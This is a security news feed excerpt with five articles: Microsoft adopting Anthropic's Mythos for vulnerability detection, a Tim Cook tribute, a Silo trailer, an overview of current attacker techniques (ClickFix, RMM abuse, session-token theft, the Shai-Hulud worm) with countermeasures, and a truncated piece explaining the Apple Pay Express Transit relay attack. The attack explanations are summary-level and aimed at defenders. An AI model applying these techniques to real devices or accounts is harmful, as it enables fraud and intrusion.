<title><![CDATA[Microsoft taps Anthropic’s Mythos to strengthen secure software development]]></title>
<description><![CDATA[Microsoft plans to integrate Anthropic’s Mythos AI model into its Security Development Lifecycle, a move that suggests advanced generative AI is beginning to play a direct role in how major software vendors identify vulnerabilities and harden code against attack.



The company said it will use M...]]></description>
<link>https://tsecurity.de/de/3457509/ai-nachrichten/microsoft-taps-anthropics-mythos-to-strengthen-secure-software-development/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3457509/ai-nachrichten/microsoft-taps-anthropics-mythos-to-strengthen-secure-software-development/</guid>
<pubDate>Thu, 23 Apr 2026 11:47:15 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Microsoft plans to integrate Anthropic’s Mythos AI model into its Security Development Lifecycle, a move that suggests advanced generative AI is beginning to play a direct role in how major software vendors identify vulnerabilities and harden code against attack.</p>



<p>The company said it will use Mythos Preview, along with other advanced models, as part of a broader push to strengthen secure coding and vulnerability detection earlier in the software development process.</p>



<p>The announcement comes as <a href="https://www.computerworld.com/article/4162278/claude-mythos-signals-a-new-era-in-ai-driven-security-finding-271-flaws-in-firefox-3.html" target="_blank">Anthropic’s Mythos</a> heightens concerns that advanced AI models could dramatically shrink the time between finding a software flaw and exploiting it. Analysts say Mythos marks a notable leap in AI-driven vulnerability research, with the ability to uncover <a href="https://www.csoonline.com/article/4158117/anthropics-mythos-signals-a-structural-cybersecurity-shift.html" target="_blank">thousands of serious flaws</a> across major operating systems and browsers.</p>



<p>OpenAI has also entered the space with GPT-5.4-Cyber, a version of its flagship model tailored for defensive cybersecurity work. <a href="https://confidis.co/about/our-leadership-team/" target="_blank" rel="noreferrer noopener">Keith Prabhu</a>, founder and CEO of Confidis, said a future OpenAI model, which he referred to as “Spud,” could emerge as an even stronger rival.</p>



<p>The move matters beyond Microsoft’s own engineering organization. For enterprise security leaders, it offers a clear sign that frontier AI models are starting to move from experimental use into core cybersecurity workflows.</p>



<p>That could change how software vendors build products and how <a href="https://www.csoonline.com/article/4149411/ai-is-breaking-traditional-security-models-heres-where-they-fail-first.html">defenders view the risks and benefits</a> of using the same AI tools attackers may also exploit.</p>



<p>“This marks a seminal turning point in the secure software development lifecycle process,” Prabhu said. “While earlier tools were only capable of static code scanning for vulnerabilities, with AI, there is a possibility of a dynamically learning model which can also perform dynamic vulnerability and even penetration testing in real time.”</p>



<p>Over time, Prabhu said, the pressure to adopt AI-assisted security tools is likely to spread beyond the largest software vendors.</p>



<h2 class="wp-block-heading">Why Microsoft’s move matters</h2>



<p><a href="https://in.linkedin.com/in/meetneilshah" target="_blank" rel="noreferrer noopener">Neil Shah</a>, vice president for research at Counterpoint Research, said more than 95% of Fortune 500 companies use Microsoft Azure in some capacity, while Azure AI and the Copilot suite are entrenched across about 65% of those companies. Millions of businesses also rely on multiple Microsoft products and cloud services.</p>



<p>“Using Mythos in Microsoft’s Security Development Lifecycle could help strengthen and harden products like Windows, Azure, Microsoft 365, and developer tools,” Shah said. “Every enterprise running those products could benefit from the security improvement without needing direct Mythos access themselves.”</p>



<p>Prabhu noted that Microsoft said it had evaluated Mythos using its open-source benchmark for real-world detection engineering tasks, with results showing substantial improvements over prior models.</p>



<p>“Such a claim coming from Microsoft does suggest that these new AI models are becoming materially better at identifying exploitable flaws than earlier generations,” Prabhu added. “However, as with any AI tool, the strength of the tool lies in its ability to analyze code quickly based on past learning. There is a possibility that it could miss new types of vulnerabilities that only a ‘human-in-the-loop’ could identify.”</p>



<p><em>The article originally appeared in <a href="https://www.csoonline.com/article/4162446/microsoft-taps-anthropics-mythos-to-strengthen-secure-software-development.html">CSO</a>. </em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Here’s to the stable ones: In praise of Tim Cook]]></title>
<description><![CDATA[Tim Cook’s tenure as Apple CEO ends September 1 when he takes the role of executive chair. He will be replaced by John Ternus, a 25-year Apple veteran and head of its hardware engineering division. I get the sense Cook’s professional obituaries will focus on his steady hand, execution success and...]]></description>
<link>https://tsecurity.de/de/3455281/it-nachrichten/heres-to-the-stable-ones-in-praise-of-tim-cook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3455281/it-nachrichten/heres-to-the-stable-ones-in-praise-of-tim-cook/</guid>
<pubDate>Wed, 22 Apr 2026 17:02:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Tim Cook’s tenure as Apple CEO ends September 1 when he takes the role of executive chair. He will be replaced by <a data-i13n="cpos:1;pos:1" href="https://www.engadget.com/computing/tim-cook-will-step-down-as-204959434.html">John Ternus</a>, a 25-year Apple veteran and head of its hardware engineering division. I get the sense Cook’s professional obituaries will focus on his steady hand, execution success and lack of intra-company drama. All of those are virtues but I suspect the media, ever in love with a narrative of its own concoction, will use them as cudgels. Consider this an attempt to balance the record ahead of Cook’s damning with the faintest of praise.</p>
<p>Cook is quiet and private, making it easy to paint him as a bland managerialist who coasted on the success of the iPhone. In Ternus, Apple once again has a “product guy” at its helm, a term loaded with enough subtext to sink a battleship. You can feel the implication that it’s only “product guys” who have the vision, taste and knowledge to innovate. By extension, Cook was never "a real nerd," but an empty finance guy that never understood what makes Apple tick.</p>
<span></span><p>If there’s one thing Silicon Valley loves more than money, it’s a mercurial genius upon whom they can rest their dreams. Figures with a capital-V vision who invent new product categories with a flick of a wrist, captains of industry who inspire awe and devotion. And making enough money that even a Rockefeller would start thinking "gosh, that’s a bit much."</p>
<p>The Jobsian myth-making obscures his talents and minimizes the number of misses he had along the way. Jobs’ first tenure at Apple ended in failure and NeXT, for all its innovation, didn’t survive as a standalone hardware maker. Many of his ideas were too big and ambitious to succeed and his refusal to compromise made them sink. His time in the wilderness made him a better manager, and a far better storyteller. But to suggest Jobs was gifted with Midas’ touch is wrong, since for all his vision and taste, he needed strong execution.</p>
<figure><img src="https://s.yimg.com/os/creatr-uploaded-images/2021-10/62573ef0-268a-11ec-bef9-d415bae9bb94" data-crop-orig-src="https://s.yimg.com/os/creatr-uploaded-images/2021-10/62573ef0-268a-11ec-bef9-d415bae9bb94" alt="Steve Jobs (R), Apple Inc. CEO, and Tim Cook, Apple Inc. Coo, speak at a press conference at Apple headquarters in Cupertino, California.  (Photo by Kimberly White/Corbis via Getty Images)" data-uuid="ebd01474-7bd5-3202-a7bc-e7cb3a5798cc"><figcaption></figcaption><div class="photo-credit">Kimberly White via Getty Images</div></figure>
<p>It doesn’t help that Jobs is the ur-example of Silicon Valley’s tech genius founder which means so many there have never stopped looking for his successor. The title of “the next Steve Jobs” has been diluted to the point of meaninglessness at this point given the list of nominees. Those include <a data-i13n="cpos:2;pos:1" href="https://www.engadget.com/elizabeth-holmes-has-her-11-year-prison-sentence-cut-by-two-years-101541361.html">Elizabeth Holmes</a>, Elon Musk, <a data-i13n="cpos:3;pos:1" href="https://www.engadget.com/wework-files-for-chapter-11-bankruptcy-protection-030708470.html">Adam Neumann</a>, <a data-i13n="cpos:4;pos:1" href="https://www.engadget.com/nikola-founder-trevor-milton-guilty-fraud-223109177.html">Trevor Milton</a>, Sam Altman and <a data-i13n="cpos:5;pos:1" href="https://www.engadget.com/uber-files-leak-221118281.html">Travis Kalanick</a>. Given that sort of company, I’m sure Cook is delighted when people say he’s no Steve Jobs.</p>
<p>I suspect, in part, Cook was seen as a mere employee (derogatory) rather than a startup founder who built something himself. That obscures his success, first at IBM and Intelligent Electronics where he took up a COO role at 34. Even in an industry that treasures youth, I doubt these companies would elevate someone as young as Cook unless he was damn good. And when he got to Apple in 1998, his role was to make the wheels of the company turn. We may laud Jobs and Ive for dreaming up the products but, to quote Jobs himself, “real artists ship.”  By that metric, Cook was the real artist.</p>
<p>When Cook took over as Apple CEO, it was just weeks before Jobs passed away, in what must have been a very hard time. Holding the company together after such a shock while grieving for your own loss must have been an enormous challenge. And while Cook had Jobs’ army of lieutenants around him, it was upon Cook to actually lead that team. That he then took Apple to the outrageous success it is today is proof of his ability to actually make things happen. Think about how it was Cook that used Apple’s initial success to make good deals with manufacturers that wound up boxing out so many of its rivals.</p>
<p>I’m sure Cook lacks the taste and vision of a Jobs or an Ive, and instead relies upon the skill of his team. I’m not sure why that would be painted as a <em>bad thing </em>given the roster of people Apple pays to have such taste. If Cook is lacking in taste, he’s not lacking in humility, and clearly knows well enough to not meddle in things. Friends, that’s not the sign of a bad leader, it’s the sign of a good one, who makes his team feel trusted, respected, and listened to. Think about how rapidly Cook democratized the Apple keynotes, making stars of many of its senior executives, rather than trying to put on a Steve Jobs tribute act.</p>
<p>His tenure as CEO wasn’t flawless: Hiring John Browett to replace Ron Johnson at Retail was an early error — but one that Cook was smart enough to correct just six months later. The power struggles with <a data-i13n="cpos:6;pos:1" href="https://www.engadget.com/2012-11-29-tony-fadell-claims-scott-forstall-got-what-he-deserved.html">Scott Forstall</a> could be a miss given Ive’s instincts around <a data-i13n="cpos:7;pos:1" href="https://www.engadget.com/2013-09-19-ios-7-and-the-death-of-textures.html">user interface design</a>. On the product front, we had the embarrassment of <a data-i13n="cpos:8;pos:1" href="https://www.engadget.com/2019-03-29-apple-cancels-airpower-charing-mat.html">AirPower,</a> the stop-start work on the <a data-i13n="cpos:9;pos:1" href="https://www.engadget.com/computing/apple-discontinues-the-mac-pro-221502339.html">Mac Pro</a> and the muted rollout of the <a data-i13n="cpos:10;pos:1" href="https://www.engadget.com/ar-vr/apple-vision-pro-m5-review-a-better-beta-is-still-a-beta-130000284.html">Vision Pro</a>. The lack of proactive management of the App Store and the opacity of its workings counts as a big strike, too. I’m sure we’ll get some chatter about the Apple Car project from people who thought that was ever a good idea.</p>
<p>As for the Trump Stuff(™), I have some sympathy for Cook, who probably didn’t expect to play diplomat when he took the job. His ties to the current administration have tainted his reputation, even if his engagement seems finely calibrated. As CEO of Apple, he’s responsible for around 170,000 people and has legal obligations as the head of a public company. As much as he <em>may</em> wish to flick the bird at the Commander in Chief, he has to tread a fine line. And it will be for him to wrestle with his own conscience to decide if he did the right thing down the line.</p>
<p>One of the pitfalls of a sustained period of success is that people lose sight of how things were in the bad old days. You can anticipate the editorials saying Cook “failed” on AI because he wisely avoided not launching head-first into a boondoggle. “Failed” on launching a new product category in the post-Jobs world, even though the Apple Watch and AirPods are, on their own, a bigger business than some major corporations. “Failed” by building a subscription and services business despite every single hardware company in the world doing the same thing.</p>
<p>I'd say Cook's judgment was far better than anyone has given him credit for, and he's made plenty of earth-shattering changes of his own. Think about Apple Silicon and how it has upended the order of things in the chip world, almost inadvertently taking a wrecking ball to Intel's dominance. A technology transition that was so seamless, so undramatic, and yet with so many dividends, that the idea of Apple using other people's chips in its hardware feels like ancient history. </p>
<p>To all of those people, I’d say look — look! — with your own stupid eyes at the MacBook Neo. Look at a company that found a way to produce hardware <em>like that</em>, with performance <em>like that</em>, for <em>that </em>sort of price! The <a data-i13n="cpos:11;pos:1" href="https://www.engadget.com/computing/laptops/macbook-neo-review-apple-puts-every-600-windows-pc-to-shame-130000878.html">MacBook Neo</a> is so good and so cheap that it’s made the rest of the consumer electronics industry look like incompetents. It may not be a shiny new gadget you can show off to the envy of your early adopter friends, but it’s going to make a meaningful difference for countless people.</p>
<p>We can all agree that no kid is going to hang a poster of Tim Cook on their bedroom wall in the same way they might with Jobs, or even Musk. I don’t think that’s a bad thing, because Cook’s legacy isn’t in headlines or fawning biopics, it’s in a legacy of actually getting things done.</p>This article originally appeared on Engadget at https://www.engadget.com/big-tech/heres-to-the-stable-ones-in-praise-of-tim-cook-144850435.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo's season 3 trailer takes us back to how it all began]]></title>
<description><![CDATA[The relatively long wait for the third season of Silo is nearly over. Apple TV just announced the dystopian sci-fi hit returns on July 3, with episodes airing each Friday until September 4. We have long championed this show, calling it "another gem" for the platform.
The streamer has dropped a sh...]]></description>
<link>https://tsecurity.de/de/3452398/it-nachrichten/silos-season-3-trailer-takes-us-back-to-how-it-all-began/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3452398/it-nachrichten/silos-season-3-trailer-takes-us-back-to-how-it-all-began/</guid>
<pubDate>Tue, 21 Apr 2026 19:16:53 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The relatively long wait for the third season of <em>Silo</em> is nearly over. Apple TV just announced the dystopian sci-fi hit <a data-i13n="elm:affiliate_link;sellerN:Apple;elmt:;cpos:1;pos:1" href="https://shopping.yahoo.com/rdlw?merchantId=4130e2f0-a14f-4c5e-bdab-cd52ac7d8e79&amp;siteId=us-engadget&amp;pageId=1p-autolink&amp;contentUuid=83005465-7194-45d5-b3e4-004223683507&amp;featureId=text-link&amp;merchantName=Apple&amp;linkText=returns+on+July+3&amp;custData=eyJzb3VyY2VOYW1lIjoiV2ViLURlc2t0b3AtVmVyaXpvbiIsImxhbmRpbmdVcmwiOiJodHRwczovL3d3dy5hcHBsZS5jb20vdHYtcHIvbmV3cy8yMDI2LzA0L2FwcGxlcy1nbG9iYWxseS1hY2NsYWltZWQtZHJhbWEtc2lsby1zdGFycmluZy1hbmQtZXhlY3V0aXZlLXByb2R1Y2VkLWJ5LXJlYmVjY2EtZmVyZ3Vzb24tcmV0dXJucy1mb3Itc2Vhc29uLXRocmVlLW9uLWp1bHktMy0yMDI2LyIsImNvbnRlbnRVdWlkIjoiODMwMDU0NjUtNzE5NC00NWQ1LWIzZTQtMDA0MjIzNjgzNTA3Iiwib3JpZ2luYWxVcmwiOiJodHRwczovL3d3dy5hcHBsZS5jb20vdHYtcHIvbmV3cy8yMDI2LzA0L2FwcGxlcy1nbG9iYWxseS1hY2NsYWltZWQtZHJhbWEtc2lsby1zdGFycmluZy1hbmQtZXhlY3V0aXZlLXByb2R1Y2VkLWJ5LXJlYmVjY2EtZmVyZ3Vzb24tcmV0dXJucy1mb3Itc2Vhc29uLXRocmVlLW9uLWp1bHktMy0yMDI2LyJ9&amp;signature=AQAAAeKPxr1X5LxrBxiyI9JztWt-u5_DHcELFGeoZdle0H6d&amp;gcReferrer=https%3A%2F%2Fwww.apple.com%2Ftv-pr%2Fnews%2F2026%2F04%2Fapples-globally-acclaimed-drama-silo-starring-and-executive-produced-by-rebecca-ferguson-returns-for-season-three-on-july-3-2026%2F" class="rapid-with-clickid" data-original-link="https://www.apple.com/tv-pr/news/2026/04/apples-globally-acclaimed-drama-silo-starring-and-executive-produced-by-rebecca-ferguson-returns-for-season-three-on-july-3-2026/"><ins>returns on July 3</ins></a>, with episodes airing each Friday until September 4. We have <a data-i13n="cpos:2;pos:1" href="https://www.engadget.com/apple-silo-review-wool-tv-show-123024485.html"><ins>long championed this show</ins></a>, calling it "another gem" for the platform.</p>
<p>The streamer has dropped a short teaser for the upcoming season and it confirms rumors of an increased focus on the "before times" via a storyline that was introduced in the finale of season two. The trailer depicts scenes from both time periods, as protagonist Juliette, played by Rebecca Ferguson, speaks in voiceover.</p>
<span></span><div></div>
<p>"Before we can know why we’re here. Before we can know everything is as it is. Before we know how it all will end, we need to understand how it all began,” she says, alluding to the creation of the various bunkers littered throughout the post-apocalyptic wasteland.</p>
<p>For the uninitiated, <em>Silo</em> is an adaptation of Hugh Howey's Wool series of books. It's primarily set in the titular silo, a society of around 10,000 people living deep underground. The show is sort of like <em>Fallout</em>, but without the radioactive monsters and nihilistic sense of humor.</p>
<p><em>Silo </em>stars Ferguson, along with Tim Robbins, Common and Steve Zahn. Cast members joining the show for season three include Colin Hanks, Jessica Henwick and Ashley Zukerman. The show has already been <a data-i13n="cpos:3;pos:1" href="https://www.engadget.com/entertainment/tv-movies/apple-tv-series-silo-will-run-for-two-more-seasons-153830028.html"><ins>renewed for a fourth and final season</ins></a>.</p>
<div></div>
<p>This is a busy summer for sci-fi on Apple TV. The second season of <em>Dark Matter</em> premieres on August 28, which is uncharted territory as the first season <a data-i13n="cpos:4;pos:1" href="https://www.engadget.com/apple-tvs-dark-matter-series-takes-on-one-of-blake-crouchs-best-books-174636542.html"><ins>was based on a book</ins></a> that doesn't have a sequel. <em>Star City</em>, a spinoff of <em>For All Mankind</em>, <a data-i13n="cpos:5;pos:1" href="https://www.engadget.com/entertainment/streaming/heres-your-first-look-at-for-all-mankind-spinoff-star-city-174359587.html"><ins>premieres on May 29</ins></a>. This is the same day that <em>For All Mankind</em> concludes its fifth and penultimate season.</p>This article originally appeared on Engadget at https://www.engadget.com/entertainment/tv-movies/silos-season-3-trailer-takes-us-back-to-how-it-all-began-171033410.html?src=rss]]></content:encoded>
</item>
<item>
<title><![CDATA[Top techniques attackers use to infiltrate your systems today]]></title>
<description><![CDATA[Much of the talk around cybersecurity these days revolves around AI and the threat it poses to corporate systems when used by nefarious actors.



But the reality on the ground remains a little more mundane than polymorphic AI malware and criminal masterminds putting machine learning and generati...]]></description>
<link>https://tsecurity.de/de/3450845/it-security-nachrichten/top-techniques-attackers-use-to-infiltrate-your-systems-today/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3450845/it-security-nachrichten/top-techniques-attackers-use-to-infiltrate-your-systems-today/</guid>
<pubDate>Tue, 21 Apr 2026 11:07:22 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Much of the talk around cybersecurity these days revolves around AI and the threat it poses to corporate systems when used by nefarious actors.</p>



<p>But the reality on the ground remains a little more mundane than <a href="https://www.csoonline.com/article/4101491/polymorphic-ai-malware-exists-but-its-not-what-you-think.html">polymorphic AI malware</a> and criminal masterminds putting machine learning and generative AI to work at scale.</p>



<p>Still, keeping on top of even minor nuances and emerging trends in the techniques cyberattackers are deploying of late can greatly help cyber defenders in their task.</p>



<p>Of note is the fact that attackers are increasingly exploiting identity as a preferred method for infiltrating systems.</p>



<p>While exploiting vulnerabilities also remains an important vector with its own emerging subtleties in practice, phishing, stolen credentials, and social engineering are among the more common root causes of initial attack today, according to threat response experts.</p>



<p>“Identity-related attack techniques such as phishing (41%), stolen credentials (18%), and social engineering (12%) dominating our incident response engagements,” Alexandra Rose, director at the Counter Threat Unit at Sophos, tells CSO.</p>



<p>Rose adds: “Attackers are increasingly looking to leverage weaknesses that can’t be targeted by patching — instead going after the human link in the chain: people.”</p>



<p>Entry points created by expanding hybrid and cloud environments, integrations with AI tooling, and new SaaS apps are also particularly attractive to threat actors, allowing them to infiltrate systems without needing to deploy traditional malware.</p>



<p>“Attackers [are exploiting] trusted tools, identities, and user behaviour rather than relying on technical sophistication” to mount attacks, according to threat intel vendor <a href="https://reliaquest.com/blog/threat-spotlight-whats-trending-top-cyber-attacker-techniques-december-2025-february-2026">ReliaQuest’s latest Annual Cyber-Threat Report</a><strong>.</strong></p>



<p>Here, cyber experts quizzed by CSO identify the most prevalent cyberattack techniques being deployed against enterprises today.</p>



<h2 class="wp-block-heading">Drive-by RMM misuse</h2>



<p>Attackers have increasingly been <a href="https://www.csoonline.com/article/3487743/attackers-increasingly-using-legitimate-remote-management-tools-to-hack-enterprises.html">abusing legitimate remote monitoring and management (RMM) tools</a> to camouflage attacks on corporate networks. Designed to help IT teams manage systems remotely, popular RMM tools, such as ConnectWise ScreenConnect, Tactical RMM, and MeshAgent, are often abused by attackers for command-and-control, lateral movement, and ransomware deployment.</p>



<p>Now, trojanized versions of RMM tools are being dropped directly onto hosts, often through drive-by compromise, according to ReliaQuest. ConnectWise ScreenConnect led RMM-related incidents between December 2025 up until the end of February 2026, according to the threat intel vendor.</p>



<p>A separate <a href="https://blackpointcyber.com/whitepaper/2026-annual-threat-report/">study by managed detection and response firm Blackpoint</a> found that abuse of legitimate RMM tools represented 30% of incidents handled by the firm.</p>



<h2 class="wp-block-heading">Network security device hacking</h2>



<p>Network edge devices have increasingly drawn attackers’ attention over the past two years, establishing a new battleground where the very devices meant to protect the network <a href="https://www.csoonline.com/article/4074945/network-security-devices-endanger-orgs-with-90s-era-flaws.html">have become attractive targets for exploitation</a>.</p>



<p>As a result, flaws in security device, such as SSL VPN systems and other gateways, are among the <a href="https://www.csoonline.com/article/3970097/the-state-of-intrusions-stolen-credentials-and-perimeter-exploits-on-the-rise-as-phishing-wanes.html">top initial access vectors for attackers</a>.</p>



<p>SSL VPN compromises, for example, accounted for 33% of identifiable activity, according to Blackpoint.</p>



<h2 class="wp-block-heading">ClickFix</h2>



<p><a href="https://www.csoonline.com/article/3610611/rising-clickfix-malware-distribution-trick-puts-powershell-it-policies-on-notice.html">ClickFix</a> is a social engineering tactic that aims to trick prospective marks into pasting and executing malicious PowerShell commands from fake “fix” prompts.</p>



<p>Because these bogus prompts come from either compromised websites or manipulated search results, the approach bypasses traditional security controls such as email filters or denylists.</p>



<p>ClickFix scams often uses fake CAPTCHA pages as the lure.</p>



<p>The methodology is most frequently used to distribute remote access trojans or infostealers, but attackers have also begun to feature ClickFix in ransomware attacks.</p>



<p>“ClickFix adoption continues to expand across the attacker spectrum, with ransomware operators like <a href="https://reliaquest.com/blog/threat-spotlight-casting-a-wider-net-clickfix-deno-and-leaknets-scaling-threat/" target="_blank" rel="noreferrer noopener">LeakNet now using ClickFix lures to run campaigns</a> directly rather than purchasing access from initial access brokers,” according to ReliaQuest.</p>



<h2 class="wp-block-heading">Identity-based attacks</h2>



<p>Attackers are increasingly impersonating legitimate users, machines, or services to gain access to systems, data, or infrastructure. The technique is on the upswing in part due to improved security defenses, according to some experts, and also demonstrates attackers’ interest in targeting authentication mechanisms rather than exploiting software vulnerabilities directly.</p>



<p>“Endpoint detection and response technologies have pushed criminals into stealing credentials — or buying them from thieves — and then using them for authentication as account users,” says Tom Exelby, head of cybersecurity at UK-based cybersecurity services firm Red Helix. “Once they have access, they can augment their privileges through systems such as Microsoft Active Directory and Entra ID.”</p>



<p>Instead of stealing passwords, attackers steal active authentication tokens to bypass multi-factor authentication (MFA) protections.</p>



<p>Attackers are increasingly using OAuth consent phishing and reverse proxy kits to steal session tokens and bypass MFA, adds cloud-native security firm Netskope.</p>



<p>“Attackers targeting Microsoft 365 environments are also adopting adversary-in-the-middle attacks,” Red Helix’s Exelby adds. “They capture credentials, MFA responses, and session cookies by using phishing kits as a proxy between the target and the legitimate authentication service.”</p>



<p>Cybercriminals are using platforms such as the Tycoon 2FA phishing-as-a-service to run adversary-in-the-middle (AiTM) attacks. Many of the victims of this attack vector are “likely to be SMBs with limited cybersecurity resources,” according to Red Helix.</p>



<h2 class="wp-block-heading">Phishing</h2>



<p><a></a>Despite a <a href="https://www.csoonline.com/article/4080691/profits-from-ransomware-attacks-are-falling-fewer-people-are-paying.html">year-over-year decline</a> in the number of people clicking on phishing links, in part due to <a href="https://www.csoonline.com/article/4071289/what-to-consider-to-make-your-enterprise-phishing-training-effective.html">improved user education</a>, this traditional form of social engineer <a href="https://www.csoonline.com/article/3850783/11-ways-cybercriminals-are-making-phishing-more-potent-than-ever.html">remains a problem</a>.</p>



<p>According to a recent study by Netskope, <a></a>87 out of every 10,000 users click on a phishing link each month. Microsoft remains <a href="https://www.csoonline.com/article/2135867/microsoft-the-brand-attackers-love-to-imitate.html">the brand attackers impersonate most</a>.</p>



<p>Remote and hybrid workforces have given attackers more opportunities for phishing and credential theft, and now the power of AI in facilitating such attacks is becoming a major concern. Cybercriminals have been putting AI to use to develop highly personalized phishing lures, automated reconnaissance, and synthetic voice and <a href="https://www.csoonline.com/article/3982379/deepfake-attacks-are-inevitable-cisos-cant-prepare-soon-enough.html">deepfake attacks</a>.</p>



<h2 class="wp-block-heading">Hacking machine identities</h2>



<p>The rapid profileration of machine identities is proving to be a <a href="https://www.csoonline.com/article/3476130/nhis-may-be-your-biggest-and-most-neglected-security-hole.html">wellspring for attackers</a> seeking inroads into corporate systems. Much of this is due to increased use of service accounts, containers, APIs, and the automation of DevOps, but agentic AI, with its promise of autonomous AI activity, is another <a href="https://www.csoonline.com/article/4109999/agentic-ai-already-hinting-at-cybersecuritys-pending-identity-crisis.html">rising source of concern for security organizations</a>.</p>



<p>“With non-human identities central to infrastructure, attackers are inevitably focusing on compromise of service accounts and <a href="https://www.csoonline.com/article/4148315/apis-are-the-new-perimeter-heres-how-cisos-are-securing-them.html">API identities</a>, which give them long-lived credentials and a broad range of permissions,” says Red Helix’s Exelby.</p>



<p>Exelby adds: “Machine identities often have weak protection, are notoriously invisible, and poorly managed.”</p>



<p>Managed service providers that hold privileged access to many client’s systems have a magnetic attraction for attackers as a potential route to carry out supply chain attacks. Even a midsize business is likely to have hundreds of SaaS apps and thousands of identities criminals can exploit.</p>



<h2 class="wp-block-heading">Shai-Hulud: The supply-chain attack evolves</h2>



<p>In September 2025, credential-stealing code <a href="https://www.csoonline.com/article/4058059/warning-hackers-have-inserted-credential-stealing-code-into-some-npm-libraries.html">wormed its way through scores of npm libraries</a>, adding a <a href="https://www.csoonline.com/article/4081492/modern-supply-chain-attacks-and-their-real-world-impact.html">modern twist to the supply chain attack</a>. What would become known as Shai-Hulud included self-propagation logic that would eventually spread to hundreds of packages by automatically replicating and injecting itself into projects owned by compromised maintainers.</p>



<p>Later versions of the npm supply-chain worm (“<a href="https://www.csoonline.com/article/4095578/new-shai-hulud-worm-spreading-through-npm-github.html">Shai-Hulud</a> 2.0”) have expanded into cloud credential theft, making it the most significant new entry in ReliaQuest’s attack technique list since the previous edition last year.</p>



<p>“The self-replicating nature [of the malware] makes containment particularly difficult once it enters a development pipeline,” ReliaQuest warns.</p>



<h2 class="wp-block-heading">Countermeasures</h2>



<p>Defenders should prioritize ClickFix-specific user training, enforce remote monitoring and management (RMM) tool allowlists, and centralize SaaS audit logging, ReliaQuest advises.</p>



<p>Protection against the tide of identity-based attacks requires a shift to layered defenses.</p>



<p>“Layered defences should include phishing-resistant authentication with hardware security keys, FIDO2 password-free approaches or certificate-based methods to reduce credential theft and adversary-in-the-middle attacks,” says Red Helix’s Exelby.</p>



<p>Exelby adds: “Zero trust and least privilege access principles are essential, validating continuously using device posture, user behaviour and network context, along with risk-scoring. Time-bound access for accounts should be part of this.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple Knows. Visa Knows. Nobody Has Fixed It. Here’s Why.]]></title>
<description><![CDATA[Photo by Arjun Phlox on UnsplashCYBERSECURITY · PAYMENT SECURITY · OPINIONApple and Visa both know about a flaw that lets attackers drain your locked iPhone. Years later, it’s still unfixed. I’ve seen this movie before.A few years ago, I was part of a multi-vendor telecom project. My company owne...]]></description>
<link>https://tsecurity.de/de/3447759/hacking/apple-knows-visa-knows-nobody-has-fixed-it-heres-why/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3447759/hacking/apple-knows-visa-knows-nobody-has-fixed-it-heres-why/</guid>
<pubDate>Mon, 20 Apr 2026 11:21:08 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="A locked iPhone resting beside a payment card — your phone is locked, but that may not be enough to protect your money." src="https://cdn-images-1.medium.com/max/1024/0*1vutpn18n41nc9pE"><figcaption>Photo by <a href="https://unsplash.com/@arjunphlox?utm_source=medium&amp;utm_medium=referral">Arjun Phlox</a> on <a href="https://unsplash.com/?utm_source=medium&amp;utm_medium=referral">Unsplash</a></figcaption></figure><h4><strong>CYBERSECURITY · PAYMENT SECURITY · OPINION</strong></h4><p><em>Apple and Visa both know about a flaw that lets attackers drain your locked iPhone. Years later, it’s still unfixed. I’ve seen this movie before.</em></p><p>A few years ago, I was part of a multi-vendor telecom project. My company owned the software. A third party owned the hardware and firmware. On paper, the security responsibilities were clear. In reality, nobody had checked.</p><p>During a preliminary audit, we found it: a security control on the hardware side that both parties had assumed the other was handling. It wasn’t a minor gap. It was a complete blind spot — sitting at the exact boundary where our systems met theirs.</p><p>Neither team had documented it. Neither team had flagged it. It had been open for 53 days.</p><p>Getting it fixed required putting both parties in the same room. The conversation was contentious. Eventually, the third party accepted ownership and closed the gap. But here’s what stayed with me: <strong>the vulnerability didn’t exist because someone was incompetent. It existed because two organizations, each managing their own risk, had both assumed someone else was managing the boundary.</strong></p><p>When I watched <a href="https://youtu.be/PPJ6NJkmDAo">Veritasium’s recent video</a> demonstrating how $10,000 was drained from a locked iPhone using Apple Pay and a Visa card, I didn’t think about the technical exploit. I thought about that room. And I realized: Apple and Visa have never had that conversation. Or if they have, nobody blinked.</p><h4><strong>What the Attack Actually Does</strong></h4><p>The vulnerability affects iPhone users who have a Visa card configured in Apple Pay’s Express Transit Mode — the feature that lets you tap to pay at a subway barrier without unlocking your phone. Convenient. Intentional. And, as it turns out, exploitable.</p><p>Researchers from the University of Birmingham and University of Surrey found that transit gates broadcast a unique code — called ‘Magic Bytes’ — to unlock Apple Pay for a contactless transaction. An attacker with a commercially available NFC device can replay those bytes to your iPhone, convincing it that it’s standing in front of a legitimate transit reader.</p><p>At the same time, the attacker modifies the communication to an EMV payment terminal — tricking it into believing your iPhone has already authenticated the user. The result: <strong>a payment of any amount, from your locked phone, to an attacker-controlled terminal, with no Face ID, no Touch ID, no PIN.</strong></p><p>The contactless transaction limit — the one most people assume protects them — is bypassed entirely. The research demonstrated successful payments up to £1,000 in lab conditions. Veritasium’s demonstration went further.</p><p>Both Apple and Visa were informed. Apple in October 2020. Visa in May 2021. 